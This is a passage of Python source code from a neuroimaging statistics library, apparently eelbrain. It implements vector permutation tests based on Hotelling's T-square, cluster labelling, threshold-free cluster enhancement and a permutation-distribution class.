if self.y:
return "ANOVA: %s ~ %s" % (self.y, self.x)
else:
return "ANOVA: %s" % self.x
def _plot_model(self):
return '%'.join(e.name for e in self._effects if isinstance(e, Factor) or
(isinstance(e, NestedEffect) and isinstance(e.effect, Factor)))
def _plot_sub(self):
return super(anova, self)._plot_sub()
def _default_plot_obj(self):
if self.samples:
return [self.masked_parameter_map(e) for e in self.effects]
else:
return self._statistic_map
def table(self, title=None, caption=None):
"""Table listing all effects and corresponding smallest p-values
Parameters
----------
title : text
Title for the table.
caption : text
Caption for the table.
Returns
-------
table : eelbrain.fmtxt.Table
ANOVA table.
"""
table = fmtxt.Table('rlr' + ('' if self.p is None else 'rl'), title=title, caption=caption)
table.cells('#', 'Effect', 'f_max')
if self.p is not None:
table.cells('p', 'sig')
table.midrule()
for i in range(len(self.effects)):
table.cell(i)
table.cell(self.effects[i])
table.cell(fmtxt.stat(self.f[i].max()))
if self.p is not None:
pmin = self.p[i].min()
table.cell(fmtxt.p(pmin))
table.cell(star(pmin))
return table
class Vector(NDDifferenceTest):
"""Test a vector field for vectors with non-random direction
Parameters
----------
y : NDVar
Dependent variable (needs to include one vector dimension).
match : None | categorial
Combine data for these categories before testing.
sub : index
Perform test with a subset of the data.
ds : None | Dataset
If a Dataset is specified, all data-objects can be specified as
names of Dataset variables
samples : int
Number of samples for permutation test (default 10000).
tmin : scalar
Threshold value for forming clusters.
tfce : bool | scalar
Use threshold-free cluster enhancement. Use a scalar to specify the
step of TFCE levels (for ``tfce is True``, 0.1 is used).
tstart : scalar
Start of the time window for the permutation test (default is the
beginning of ``y``).
tstop : scalar
Stop of the time window for the permutation test (default is the
end of ``y``).
parc : str
Collect permutation statistics for all regions of the parcellation of
this dimension. For threshold-based test, the regions are disconnected.
force_permutation: bool
Conduct permutations regardless of whether there are any clusters.
norm : bool
Use the vector norm as univariate test statistic (instead of Hotelling’s
T-Square statistic).
mintime : scalar
Minimum duration for clusters (in seconds).
minsource : int
Minimum number of sources per cluster.
Attributes
----------
n : int
Number of cases.
difference : NDVar
The vector field averaged across cases.
t2 : NDVar | None
Hotelling T-Square map; ``None`` if the test used ``norm=True``.
p : NDVar | None
Map of p-values corrected for multiple comparison (or ``None`` if no
correction was performed).
tfce_map : NDVar | None
Map of the test statistic processed with the threshold-free cluster
enhancement algorithm (or None if no TFCE was performed).
clusters : None | Dataset
For cluster-based tests, a table of all clusters. Otherwise a table of
all significant regions (or ``None`` if permutations were omitted).
See also the :meth:`.find_clusters` method.
Notes
-----
Vector tests are based on the Hotelling T-Square statistic. Computation of
the T-Square statistic relies on [1]_.
References
----------
.. [1] Kopp, J. (2008). Efficient numerical diagonalization of hermitian 3 x
3 matrices. International Journal of Modern Physics C, 19(3), 523-548.
`10.1142/S0129183108012303 <https://doi.org/10.1142/S0129183108012303>`_
"""
_state_specific = ('difference', 'n', '_v_dim', 't2')
@user_activity
def __init__(
self,
y: NDVarArg,
match: CategorialArg = None,
sub: IndexArg = None,
ds: Dataset = None,
samples: int = 10000,
tmin: float = None,
tfce: Union[float, bool] = False,
tstart: float = None,
tstop: float = None,
parc: str = None,
force_permutation: bool = False,
norm: bool = False,
**criteria):
use_norm = bool(norm)
ct = Celltable(y, match=match, sub=sub, ds=ds, coercion=asndvar, dtype=np.float64)
n = len(ct.y)
cdist = NDPermutationDistribution(ct.y, samples, tmin, tfce, 1, 'norm', 'Vector test', tstart, tstop, criteria, parc, force_permutation)
v_dim = ct.y.dimnames[cdist._vector_ax + 1]
v_mean = ct.y.mean('case')
v_mean_norm = v_mean.norm(v_dim)
if not use_norm:
t2_map = self._vector_t2_map(ct.y)
cdist.add_original(t2_map.x if v_mean.ndim > 1 else t2_map)
if v_mean.ndim == 1:
self.t2 = t2_map
else:
self.t2 = NDVar(t2_map, v_mean_norm.dims, _info.for_stat_map('t2'), 't2')
else:
cdist.add_original(v_mean_norm.x if v_mean.ndim > 1 else v_mean_norm)
self.t2 = None
if cdist.do_permutation:
iterator = random_seeds(samples)
vector_perm = partial(self._vector_perm, use_norm=use_norm)
run_permutation(vector_perm, cdist, iterator)
# store attributes
NDTest.__init__(self, ct.y, ct.match, sub, samples, tfce, None, cdist, tstart, tstop)
self.difference = v_mean
self._v_dim = v_dim
self.n = n
self._expand_state()
def __setstate__(self, state):
if 'diff' in state:
state['difference'] = state.pop('diff')
NDTest.__setstate__(self, state)
@property
def _statistic(self):
return 'norm' if self.t2 is None else 't2'
def _name(self):
if self.y:
return f"Vector test: {self.y}"
else:
return "Vector test"
def _repr_test_args(self):
args = []
if self.y:
args.append(repr(self.y))
if self.match:
args.append(f'match={self.match!r}')
return args
@staticmethod
def _vector_perm(y, out, seed, use_norm):
n_cases, n_dims, n_tests = y.shape
assert n_dims == 3
rotation = rand_rotation_matrices(n_cases, seed)
if use_norm:
return vector.mean_norm_rotated(y, rotation, out)
else:
return vector.t2_stat_rotated(y, rotation, out)
@staticmethod
def _vector_t2_map(y):
dimnames = y.get_dimnames(first=('case', 'space'))
x = y.get_data(dimnames)
t2_map = stats.t2_1samp(x)
if y.ndim == 2:
return np.float64(t2_map)
else:
dims = y.get_dims(dimnames[2:])
return NDVar(t2_map, dims)
class VectorDifferenceIndependent(Vector):
"""Test difference between two vector fields for non-random direction
Parameters
----------
y : NDVar
Dependent variable.
x : categorial | NDVar
Model containing the cells which should be compared, or NDVar to which
``y`` should be compared. In the latter case, the next three parameters
are ignored.
c1 : str | tuple | None
Test condition (cell of ``x``). ``c1`` and ``c0`` can be omitted if
``x`` only contains two cells, in which case cells will be used in
alphabetical order.
c0 : str | tuple | None
Control condition (cell of ``x``).
match : categorial
Combine cases with the same cell on ``x % match``.
sub : index
Perform the test with a subset of the data.
ds : None | Dataset
If a Dataset is specified, all data-objects can be specified as
names of Dataset variables.
samples : int
Number of samples for permutation test (default 10000).
tmin : scalar
Threshold value for forming clusters.
tfce : bool | scalar
Use threshold-free cluster enhancement. Use a scalar to specify the
step of TFCE levels (for ``tfce is True``, 0.1 is used).
tstart : scalar
Start of the time window for the permutation test (default is the
beginning of ``y``).
tstop : scalar
Stop of the time window for the permutation test (default is the
end of ``y``).
parc : str
Collect permutation statistics for all regions of the parcellation of
this dimension. For threshold-based test, the regions are disconnected.
force_permutation: bool
Conduct permutations regardless of whether there are any clusters.
norm : bool
Use the vector norm as univariate test statistic (instead of Hotelling’s
T-Square statistic).
mintime : scalar
Minimum duration for clusters (in seconds).
minsource : int
Minimum number of sources per cluster.
Attributes
----------
n : int
Total number of cases.
n1 : int
Number of cases in ``c1``.
n0 : int
Number of cases in ``c0``.
c1_mean : NDVar
Mean in the c1 condition.
c0_mean : NDVar
Mean in the c0 condition.
difference : NDVar
Difference between the mean in condition c1 and condition c0.
t2 : NDVar | None
Hotelling T-Square map; ``None`` if the test used ``norm=True``.
p : NDVar | None
Map of p-values corrected for multiple comparison (or None if no
correction was performed).
tfce_map : NDVar | None
Map of the test statistic processed with the threshold-free cluster
enhancement algorithm (or None if no TFCE was performed).
clusters : None | Dataset
For cluster-based tests, a table of all clusters. Otherwise a table of
all significant regions (or ``None`` if permutations were omitted).
See also the :meth:`.find_clusters` method.
"""
_state_specific = ('difference', 'c1_mean', 'c0_mean' 'n', '_v_dim', 't2')
_statistic = 'norm'
@user_activity
def __init__(
self,
y: NDVarArg,
x: Union[CategorialArg, NDVarArg],
c1: str = None,
c0: str = None,
match: CategorialArg = None,
sub: IndexArg = None,
ds: Dataset = None,
samples: int = 10000,
tmin: float = None,
tfce: bool = False,
tstart: float = None,
tstop: float = None,
parc: str = None,
force_permutation: bool = False,
norm: bool = False,
**criteria):
use_norm = bool(norm)
y, y1, y0, c1, c0, match, x_name, c1_name, c0_name = _independent_measures_args(y, x, c1, c0, match, ds, sub, True)
self.n1 = len(y1)
self.n0 = len(y0)
self.n = len(y)
cdist = NDPermutationDistribution(y, samples, tmin, tfce, 1, 'norm', 'Vector test (independent)', tstart, tstop, criteria, parc, force_permutation)
self._v_dim = v_dim = y.dimnames[cdist._vector_ax + 1]
self.c1_mean = y1.mean('case', name=cellname(c1_name))
self.c0_mean = y0.mean('case', name=cellname(c0_name))
self.difference = self.c1_mean - self.c0_mean
self.difference.name = 'difference'
v_mean_norm = self.difference.norm(v_dim)
if not use_norm:
raise NotImplementedError("t2 statistic not implemented for VectorDifferenceIndependent")
else:
cdist.add_original(v_mean_norm.x if self.difference.ndim > 1 else v_mean_norm)
self.t2 = None
if cdist.do_permutation:
iterator = random_seeds(samples)
vector_perm = partial(self._vector_perm, use_norm=use_norm)
run_permutation(vector_perm, cdist, iterator, self.n1)
NDTest.__init__(self, y, match, sub, samples, tfce, None, cdist, tstart, tstop)
self._expand_state()
def _name(self):
if self.y:
return f"Vector test (independent): {self.y}"
else:
return "Vector test (independent)"
@staticmethod
def _vector_perm(y, n1, out, seed, use_norm):
assert use_norm
n_cases, n_dims, n_tests = y.shape
assert n_dims == 3
# randomize directions
rotation = rand_rotation_matrices(n_cases, seed)
# randomize groups
cases = np.arange(n_cases)
np.random.shuffle(cases)
# group 1
mean_1 = np.zeros((n_dims, n_tests))
for case in cases[:n1]:
mean_1 += np.tensordot(rotation[case], y[case], ((1,), (0,)))
mean_1 /= n1
# group 0
mean_0 = np.zeros((n_dims, n_tests))
for case in cases[n1:]:
mean_0 += np.tensordot(rotation[case], y[case], ((1,), (0,)))
mean_0 /= (n_cases - n1)
# difference
mean_1 -= mean_0
norm = scipy.linalg.norm(mean_1, 2, axis=0)
if out is not None:
out[:] = norm
return norm
class VectorDifferenceRelated(NDMaskedC1Mixin, Vector):
"""Test difference between two vector fields for non-random direction
Parameters
----------
y : NDVar
Dependent variable.
x : categorial | NDVar
Model containing the cells which should be compared, or NDVar to which
``y`` should be compared. In the latter case, the next three parameters
are ignored.
c1 : str | tuple | None
Test condition (cell of ``x``). ``c1`` and ``c0`` can be omitted if
``x`` only contains two cells, in which case cells will be used in
alphabetical order.
c0 : str | tuple | None
Control condition (cell of ``x``).
match : categorial
Units within which measurements are related (e.g. 'subject' in a
within-subject comparison).
sub : index
Perform the test with a subset of the data.
ds : None | Dataset
If a Dataset is specified, all data-objects can be specified as
names of Dataset variables.
samples : int
Number of samples for permutation test (default 10000).
tmin : scalar
Threshold value for forming clusters.
tfce : bool | scalar
Use threshold-free cluster enhancement. Use a scalar to specify the
step of TFCE levels (for ``tfce is True``, 0.1 is used).
tstart : scalar
Start of the time window for the permutation test (default is the
beginning of ``y``).
tstop : scalar
Stop of the time window for the permutation test (default is the
end of ``y``).
parc : str
Collect permutation statistics for all regions of the parcellation of
this dimension. For threshold-based test, the regions are disconnected.
force_permutation: bool
Conduct permutations regardless of whether there are any clusters.
norm : bool
Use the vector norm as univariate test statistic (instead of Hotelling’s
T-Square statistic).
mintime : scalar
Minimum duration for clusters (in seconds).
minsource : int
Minimum number of sources per cluster.
Attributes
----------
n : int
Number of cases.
c1_mean : NDVar
Mean in the ``c1`` condition.
c0_mean : NDVar
Mean in the ``c0`` condition.
difference : NDVar
Difference between the mean in condition ``c1`` and condition ``c0``.
t2 : NDVar | None
Hotelling T-Square map; ``None`` if the test used ``norm=True``.
p : NDVar | None
Map of p-values corrected for multiple comparison (or ``None`` if no
correction was performed).
tfce_map : NDVar | None
Map of the test statistic processed with the threshold-free cluster
enhancement algorithm (or None if no TFCE was performed).
clusters : None | Dataset
For cluster-based tests, a table of all clusters. Otherwise a table of
all significant regions (or ``None`` if permutations were omitted).
See also the :meth:`.find_clusters` method.
See Also
--------
Vector : One-sample vector test, notes on vector test implementation
"""
_state_specific = ('difference', 'c1_mean', 'c0_mean' 'n', '_v_dim', 't2')
@user_activity
def __init__(
self,
y: NDVarArg,
x: Union[CategorialArg, NDVarArg],
c1: str = None,
c0: str = None,
match: CategorialArg = None,
sub: IndexArg = None,
ds: Dataset = None,
samples: int = 10000,
tmin: float = None,
tfce: bool = False,
tstart: float = None,
tstop: float = None,
parc: str = None,
force_permutation: bool = False,
norm: bool = False,
**criteria):
use_norm = bool(norm)
y1, y0, c1, c0, match, n, x_name, c1, c1_name, c0, c0_name = _related_measures_args(y, x, c1, c0, match, ds, sub, True)
difference = y1 - y0
difference.name = 'difference'
n_samples, samples = _resample_params(n, samples)
cdist = NDPermutationDistribution(difference, n_samples, tmin, tfce, 1, 'norm', 'Vector test (related)', tstart, tstop, criteria, parc, force_permutation)
v_dim = difference.dimnames[cdist._vector_ax + 1]
v_mean = difference.mean('case')
v_mean_norm = v_mean.norm(v_dim)
if not use_norm:
t2_map = self._vector_t2_map(difference)
cdist.add_original(t2_map.x if v_mean.ndim > 1 else t2_map)
if v_mean.ndim == 1:
self.t2 = t2_map
else:
self.t2 = NDVar(t2_map, v_mean_norm.dims, _info.for_stat_map('t2'), 't2')
else:
cdist.add_original(v_mean_norm.x if v_mean.ndim > 1 else v_mean_norm)
self.t2 = None
if cdist.do_permutation:
iterator = random_seeds(n_samples)
vector_perm = partial(self._vector_perm, use_norm=use_norm)
run_permutation(vector_perm, cdist, iterator)
# store attributes
NDTest.__init__(self, difference, match, sub, samples, tfce, None, cdist, tstart, tstop)
self.difference = v_mean
self.c1_mean = y1.mean('case', name=cellname(c1_name))
self.c0_mean = y0.mean('case', name=cellname(c0_name))
self._v_dim = v_dim
self.n = n
self._expand_state()
def _name(self):
if self.y:
return f"Vector test (related): {self.y}"
else:
return "Vector test (related)"
def flatten(array, connectivity):
"""Reshape SPM buffer array to 2-dimensional map for connectivity processing
Parameters
----------
array : ndarray
N-dimensional array (with non-adjacent dimension at first position).
connectivity : Connectivity
N-dimensional connectivity.
Returns
-------
flat_array : ndarray
The input array reshaped if necessary, making sure that input and output
arrays share the same underlying data buffer.
"""
if array.ndim == 2 or not connectivity.custom:
return array
else:
out = array.reshape((array.shape[0], -1))
assert out.base is array
return out
def flatten_1d(array):
if array.ndim == 1:
return array
else:
out = array.ravel()
assert out.base is array
return out
def label_clusters(stat_map, threshold, tail, connectivity, criteria):
"""Label clusters
Parameters
----------
stat_map : array
Statistical parameter map (non-adjacent dimension on the first
axis).
Returns
-------
cmap : np.ndarray of uint32
Array with clusters labelled as integers.
cluster_ids : np.ndarray of uint32
Identifiers of the clusters that survive the minimum duration
criterion.
"""
cmap = np.empty(stat_map.shape, np.uint32)
bin_buff = np.empty(stat_map.shape, np.bool8)
cmap_flat = flatten(cmap, connectivity)
if tail == 0:
int_buff = np.empty(stat_map.shape, np.uint32)
int_buff_flat = flatten(int_buff, connectivity)
else:
int_buff = int_buff_flat = None
cids = _label_clusters(stat_map, threshold, tail, connectivity, criteria,
cmap, cmap_flat, bin_buff, int_buff, int_buff_flat)
return cmap, cids
def _label_clusters(stat_map, threshold, tail, conn, criteria, cmap, cmap_flat,
bin_buff, int_buff, int_buff_flat):
"""Find clusters on a statistical parameter map
Parameters
----------
stat_map : array
Statistical parameter map (non-adjacent dimension on the first
axis).
cmap : array of int
Buffer for the cluster id map (will be modified).
Returns
-------
cluster_ids : np.ndarray of uint32
Identifiers of the clusters that survive the minimum duration
criterion.
"""
# compute clusters
if tail >= 0:
bin_map_above = np.greater(stat_map, threshold, bin_buff)
cids = _label_clusters_binary(bin_map_above, cmap, cmap_flat, conn,
criteria)
if tail <= 0:
bin_map_below = np.less(stat_map, -threshold, bin_buff)
if tail < 0:
cids = _label_clusters_binary(bin_map_below, cmap, cmap_flat, conn,
criteria)
else:
cids_l = _label_clusters_binary(bin_map_below, int_buff,
int_buff_flat, conn, criteria)
x = cmap.max()
int_buff[bin_map_below] += x
cids_l += x
cmap += int_buff
cids = np.concatenate((cids, cids_l))
return cids
def label_clusters_binary(bin_map, connectivity, criteria=None):
"""Label clusters in a boolean map
Parameters
----------
bin_map : numpy.ndarray
Binary map.
connectivity : Connectivity
Connectivity corresponding to ``bin_map``.
criteria : dict
Cluster criteria.
Returns
-------
cmap : numpy.ndarray of uint32
Array with clusters labelled as integers.
cluster_ids : numpy.ndarray of uint32
Sorted identifiers of the clusters that survive the selection criteria.
"""
cmap = np.empty(bin_map.shape, np.uint32)
cmap_flat = flatten(cmap, connectivity)
cids = _label_clusters_binary(bin_map, cmap, cmap_flat, connectivity, criteria)
return cmap, cids
def _label_clusters_binary(bin_map, cmap, cmap_flat, connectivity, criteria):
"""Label clusters in a binary array
Parameters
----------
bin_map : np.ndarray
Binary map of where the parameter map exceeds the threshold for a
cluster (non-adjacent dimension on the first axis).
cmap : np.ndarray
Array in which to label the clusters.
cmap_flat : np.ndarray
Flat copy of cmap (ndim=2, only used when all_adjacent==False)
connectivity : Connectivity
Connectivity.
criteria : None | list
Cluster size criteria, list of (axes, v) tuples. Collapse over axes
and apply v minimum length).
Returns
-------
cluster_ids : np.ndarray of uint32
Sorted identifiers of the clusters that survive the selection criteria.
"""
# find clusters
n = ndimage.label(bin_map, connectivity.struct, cmap)
if n <= 1:
# in older versions, n is 1 even when no cluster is found
if n == 0 or cmap.max() == 0:
return np.array((), np.uint32)
else:
cids = np.array((1,), np.uint32)
elif connectivity.custom:
cids = merge_labels(cmap_flat, n, *connectivity.custom[0])
else:
cids = np.arange(1, n + 1, 1, np.uint32)
# apply minimum cluster size criteria
if criteria and cids.size:
for axes, v in criteria:
cids = np.setdiff1d(cids,
[i for i in cids if np.count_nonzero(np.equal(cmap, i).any(axes)) < v],
True)
if cids.size == 0:
break
return cids
def tfce(stat_map, tail, connectivity, dh=0.1):
tfce_im = np.empty(stat_map.shape, np.float64)
tfce_im_1d = flatten_1d(tfce_im)
bin_buff = np.empty(stat_map.shape, np.bool8)
int_buff = np.empty(stat_map.shape, np.uint32)
int_buff_flat = flatten(int_buff, connectivity)
int_buff_1d = flatten_1d(int_buff)
return _tfce(stat_map, tail, connectivity, tfce_im, tfce_im_1d, bin_buff, int_buff,
int_buff_flat, int_buff_1d, dh)
def _tfce(stat_map, tail, conn, out, out_1d, bin_buff, int_buff,
int_buff_flat, int_buff_1d, dh=0.1, e=0.5, h=2.0):
"Threshold-free cluster enhancement"
out.fill(0)
# determine slices
if tail == 0:
hs = chain(np.arange(-dh, stat_map.min(), -dh),
np.arange(dh, stat_map.max(), dh))
elif tail < 0:
hs = np.arange(-dh, stat_map.min(), -dh)
else:
hs = np.arange(dh, stat_map.max(), dh)
# label clusters in slices at different heights
# fill each cluster with total section value
# each point's value is the vertical sum
for h_ in hs:
if h_ > 0:
np.greater_equal(stat_map, h_, bin_buff)
h_factor = h_ ** h
else:
np.less_equal(stat_map, h_, bin_buff)
h_factor = (-h_) ** h
c_ids = _label_clusters_binary(bin_buff, int_buff, int_buff_flat, conn, None)
tfce_increment(c_ids, int_buff_1d, out_1d, e, h_factor)
return out
class StatMapProcessor:
def __init__(self, tail, max_axes, parc):
"""Reduce a statistical map to the relevant maximum statistic"""
self.tail = tail
self.max_axes = max_axes
self.parc = parc
def max_stat(self, stat_map):
if self.tail == 0:
v = np.abs(stat_map, stat_map).max(self.max_axes)
elif self.tail > 0:
v = stat_map.max(self.max_axes)
else:
v = -stat_map.min(self.max_axes)
if self.parc is None:
return v
else:
return [v[idx].max() for idx in self.parc]
class TFCEProcessor(StatMapProcessor):
def __init__(self, tail, max_axes, parc, shape, connectivity, dh):
StatMapProcessor.__init__(self, tail, max_axes, parc)
self.shape = shape
self.connectivity = connectivity
self.dh = dh
# Pre-allocate memory buffers used for cluster processing
self._bin_buff = np.empty(shape, np.bool8)
self._int_buff = np.empty(shape, np.uint32)
self._tfce_im = np.empty(shape, np.float64)
self._tfce_im_1d = flatten_1d(self._tfce_im)
self._int_buff_flat = flatten(self._int_buff, connectivity)
self._int_buff_1d = flatten_1d(self._int_buff)
def max_stat(self, stat_map):
v = _tfce(
stat_map, self.tail, self.connectivity, self._tfce_im, self._tfce_im_1d,
self._bin_buff, self._int_buff, self._int_buff_flat, self._int_buff_1d,
self.dh,
).max(self.max_axes)
if self.parc is None:
return v
else:
return [v[idx].max() for idx in self.parc]
class ClusterProcessor(StatMapProcessor):
def __init__(self, tail, max_axes, parc, shape, connectivity, threshold,
criteria):
StatMapProcessor.__init__(self, tail, max_axes, parc)
self.shape = shape
self.connectivity = connectivity
self.threshold = threshold
self.criteria = criteria
# Pre-allocate memory buffers used for cluster processing
self._bin_buff = np.empty(shape, np.bool8)
self._cmap = np.empty(shape, np.uint32)
self._cmap_flat = flatten(self._cmap, connectivity)
if tail == 0:
self._int_buff = np.empty(shape, np.uint32)
self._int_buff_flat = flatten(self._int_buff, connectivity)
else:
self._int_buff = self._int_buff_flat = None
def max_stat(self, stat_map, threshold=None):
if threshold is None:
threshold = self.threshold
cmap = self._cmap
cids = _label_clusters(stat_map, threshold, self.tail, self.connectivity,
self.criteria, cmap, self._cmap_flat,
self._bin_buff, self._int_buff,
self._int_buff_flat)
if self.parc is not None:
v = []
for idx in self.parc:
clusters_v = ndimage.sum(stat_map[idx], cmap[idx], cids)
if len(clusters_v):
if self.tail <= 0:
np.abs(clusters_v, clusters_v)
v.append(clusters_v.max())
else:
v.append(0)
return v
elif len(cids):
clusters_v = ndimage.sum(stat_map, cmap, cids)
if self.tail <= 0:
np.abs(clusters_v, clusters_v)
return clusters_v.max()
else:
return 0
def get_map_processor(kind, *args):
if kind == 'tfce':
return TFCEProcessor(*args)
elif kind == 'cluster':
return ClusterProcessor(*args)
elif kind == 'raw':
return StatMapProcessor(*args)
else:
raise ValueError("kind=%s" % repr(kind))
class NDPermutationDistribution:
"""Accumulate information on a cluster statistic.
Parameters
----------
y : NDVar
Dependent variable.
samples : int
Number of permutations.
threshold : scalar > 0
Threshold-based clustering.
tfce : bool | scalar
Threshold-free cluster enhancement.
tail : 1 | 0 | -1
Which tail(s) of the distribution to consider. 0 is two-tailed,
whereas 1 only considers positive values and -1 only considers
negative values.
meas : str
Label for the parameter measurement (e.g., 't' for t-values).
name : None | str
Name for the comparison.
tstart, tstop : None | scalar
Restrict the time window for finding clusters (None: use the whole
epoch).
criteria : dict
Dictionary with threshold criteria for cluster size: 'mintime'
(seconds) and 'minsource' (n_sources).
parc : str
Collect permutation statistics for all regions of the parcellation of
this dimension. For threshold-based test, the regions are disconnected.
force_permutation : bool
Conduct permutations regardless of whether there are any clusters.
Notes
-----
Use of the NDPermutationDistribution proceeds in 3 steps:
- initialize the NDPermutationDistribution object: ``cdist = NDPermutationDistribution(...)``
- use a copy of y cropped to the time window of interest:
``y = cdist.Y_perm``
- add the actual statistical map with ``cdist.add_original(pmap)``
- if any clusters are found (``if cdist.n_clusters``):
- proceed to add statistical maps from permuted data with
``cdist.add_perm(pmap)``.
Permutation data shape: case, [vector, ][non-adjacent, ] ...
internal shape: [non-adjacent, ] ...
"""
tfce_warning = None
def __init__(self, y, samples, threshold, tfce=False, tail=0, meas='?', name=None,
tstart=None, tstop=None, criteria={}, parc=None, force_permutation=False):
assert y.has_case
assert parc is None or isinstance(parc, str)
if tfce and threshold:
raise RuntimeError(f"threshold={threshold!r}, tfce={tfce!r}: mutually exclusive parameters")
elif tfce:
if tfce is not True:
tfce = abs(tfce)
kind = 'tfce'
elif threshold:
threshold = float(threshold)
kind = 'cluster'
assert threshold > 0
else:
kind = 'raw'
# vector: will be removed for stat_map
vector = [d._connectivity_type == 'vector' for d in y.dims[1:]]
has_vector_ax = any(vector)
if has_vector_ax:
vector_ax = vector.index(True)
else:
vector_ax = None
# prepare temporal cropping
if (tstart is None) and (tstop is None):
y_perm = y
self._crop_for_permutation = False
self._crop_idx = None
else:
t_ax = y.get_axis('time') - 1
y_perm = y.sub(time=(tstart, tstop))
# for stat-maps
if vector_ax is not None and vector_ax < t_ax:
t_ax -= 1
t_slice = y.time._array_index(slice(tstart, tstop))
self._crop_for_permutation = True
self._crop_idx = FULL_AXIS_SLICE * t_ax + (t_slice,)
dims = list(y_perm.dims[1:])
if has_vector_ax:
del dims[vector_ax]
# custom connectivity: move non-adjacent connectivity to first axis
custom = [d._connectivity_type == 'custom' for d in dims]
n_custom = sum(custom)
if n_custom > 1:
raise NotImplementedError("More than one axis with custom connectivity")
nad_ax = None if n_custom == 0 else custom.index(True)
if nad_ax:
swapped_dims = list(dims)
swapped_dims[0], swapped_dims[nad_ax] = dims[nad_ax], dims[0]
else:
swapped_dims = dims
connectivity = Connectivity(swapped_dims, parc)
assert connectivity.vector is None
# cluster map properties
ndim = len(dims)
# prepare cluster minimum size criteria
if criteria:
criteria_ = []
for k, v in criteria.items():
m = re.match('min(\w+)', k)
if m:
dimname = m.group(1)
if not y.has_dim(dimname):
raise TypeError(
"%r is an invalid keyword argument for this testnd "
"function (no dimension named %r)" % (k, dimname))
ax = y.get_axis(dimname) - 1
if dimname == 'time':
v = int(ceil(v / y.time.tstep))
else:
raise TypeError("%r is an invalid keyword argument for this testnd function" % (k,))
if nad_ax:
if ax == 0:
ax = nad_ax
elif ax == nad_ax:
ax = 0
axes = tuple(i for i in range(ndim) if i != ax)
criteria_.append((axes, v))
if kind != 'cluster':
# here so that invalid keywords raise explicitly
err = ("Can not use cluster size criteria when doing "
"threshold free cluster evaluation")
raise ValueError(err)
else:
criteria_ = None
# prepare distribution
samples = int(samples)
if parc:
for parc_ax, parc_dim in enumerate(swapped_dims):
if parc_dim.name == parc:
break
else:
raise ValueError("parc=%r (no dimension named %r)" % (parc, parc))
if parc_dim._connectivity_type == 'none':
parc_indexes = np.arange(len(parc_dim))
elif kind == 'tfce':
raise NotImplementedError(
f"TFCE for parc={parc!r} ({parc_dim.__class__.__name__} dimension)")
elif parc_dim._connectivity_type == 'custom':
if not hasattr(parc_dim, 'parc'):
raise NotImplementedError(f"parc={parc!r}: dimension has no parcellation")
parc_indexes = tuple(np.flatnonzero(parc_dim.parc == cell) for
cell in parc_dim.parc.cells)
parc_dim = Categorial(parc, parc_dim.parc.cells)
else:
raise NotImplementedError(f"parc={parc!r}")
dist_shape = (samples, len(parc_dim))
dist_dims = ('case', parc_dim)
max_axes = tuple(chain(range(parc_ax), range(parc_ax + 1, ndim)))
else:
dist_shape = (samples,)
dist_dims = None
max_axes = None
parc_indexes = None
# arguments for the map processor
shape = tuple(map(len, swapped_dims))
if kind == 'raw':
map_args = (kind, tail, max_axes, parc_indexes)
elif kind == 'tfce':
dh = 0.1 if tfce is True else tfce
map_args = (kind, tail, max_axes, parc_indexes, shape, connectivity, dh)
else:
map_args = (kind, tail, max_axes, parc_indexes, shape, connectivity, threshold, criteria_)
self.kind = kind
self.y_perm = y_perm
self.dims = tuple(dims) # external stat map dims (cropped time)
self.shape = shape # internal stat map shape
self._connectivity = connectivity
self.samples = samples
self.dist_shape = dist_shape
self._dist_dims = dist_dims
self._max_axes = max_axes
self.dist = None
self.threshold = threshold
self.tfce = tfce
self.tail = tail
self._nad_ax = nad_ax
self._vector_ax = vector_ax
self.tstart = tstart
self.tstop = tstop
self.parc = parc
self.meas = meas
self.name = name
self._criteria = criteria_
self.criteria = criteria
self.map_args = map_args
self.has_original = False
self.do_permutation = False
self.dt_perm = None
self._finalized = False
self._init_time = current_time()
self._host = socket.gethostname()
self.force_permutation = force_permutation
from .. import __version__
self._version = __version__
def _crop(self, im):
"Crop an original stat_map"
if self._crop_for_permutation:
return im[self._crop_idx]
else:
return im
def uncrop(
self,
ndvar: NDVar, # NDVar to uncrop
to: NDVar, # NDVar that has the target time dimensions
default: float = 0, # value to fill in uncropped area
):
if self.tstart is None and self.tstop is None:
return ndvar
target_time = to.get_dim('time')
t_ax = ndvar.get_axis('time')
dims = list(ndvar.dims)
dims[t_ax] = target_time
shape = list(ndvar.shape)
shape[t_ax] = len(target_time)
t_slice = target_time._array_index(slice(self.tstart, self.tstop))
x = np.empty(shape, ndvar.x.dtype)
x.fill(default)
x[FULL_AXIS_SLICE * t_ax + (t_slice,)] = ndvar.x
return NDVar(x, dims, ndvar.info, ndvar.name)
def add_original(self, stat_map):
"""Add the original statistical parameter map.
Parameters
----------
stat_map : array
Parameter map of the statistic of interest (uncropped).
"""
if self.has_original:
raise RuntimeError("Original pmap already added")
logger = logging.getLogger(__name__)
logger.debug("Adding original parameter map...")
# crop/reshape stat_map
stat_map = self._crop(stat_map)
if self._nad_ax:
stat_map = stat_map.swapaxes(0, self._nad_ax)
# process map
if self.kind == 'tfce':
dh = 0.1 if self.tfce is True else self.tfce
self.tfce_warning = max(stat_map.max(), -stat_map.min()) < dh
cmap = tfce(stat_map, self.tail, self._connectivity, dh)
cids = None
n_clusters = cmap.max() > 0
elif self.kind == 'cluster':
cmap, cids = label_clusters(stat_map, self.threshold, self.tail,
self._connectivity, self._criteria)
n_clusters = len(cids)
# clean original cluster map
idx = np.in1d(cmap, cids, invert=True).reshape(self.shape)
cmap[idx] = 0
else:
cmap = stat_map
cids = None
n_clusters = True
self._t0 = current_time()
self._original_cluster_map = cmap
self._cids = cids
self.n_clusters = n_clusters
self.has_original = True
self.dt_original = self._t0 - self._init_time
self._original_param_map = stat_map
if self.force_permutation or (self.samples and n_clusters):
self._create_dist()
self.do_permutation = True
else:
self.dist_array = None
self.finalize()
def _create_dist(self):
"Create the distribution container"
if CONFIG['n_workers']:
n = reduce(operator.mul, self.dist_shape)
dist_array = RawArray('d', n)
dist = np.frombuffer(dist_array, np.float64, n)
dist.shape = self.dist_shape
else:
dist_array = None
dist = np.zeros(self.dist_shape)
self.dist_array = dist_array
self.dist = dist
def _aggregate_dist(self, **sub):
"""Aggregate permutation distribution to one value per permutation
Parameters
----------
[dimname] : index
Limit the data for the distribution.
Returns
-------
dist : array, shape = (samples,)
Maximum value for each permutation in the given region.
"""
dist = self.dist
if sub:
if self._dist_dims is None:
raise TypeError("NDPermutationDistribution does not have parcellation")
dist_ = NDVar(dist, self._dist_dims)
dist_sub = dist_.sub(**sub)
dist = dist_sub.x
if dist.ndim > 1:
axes = tuple(range(1, dist.ndim))
dist = dist.max(axes)
return dist
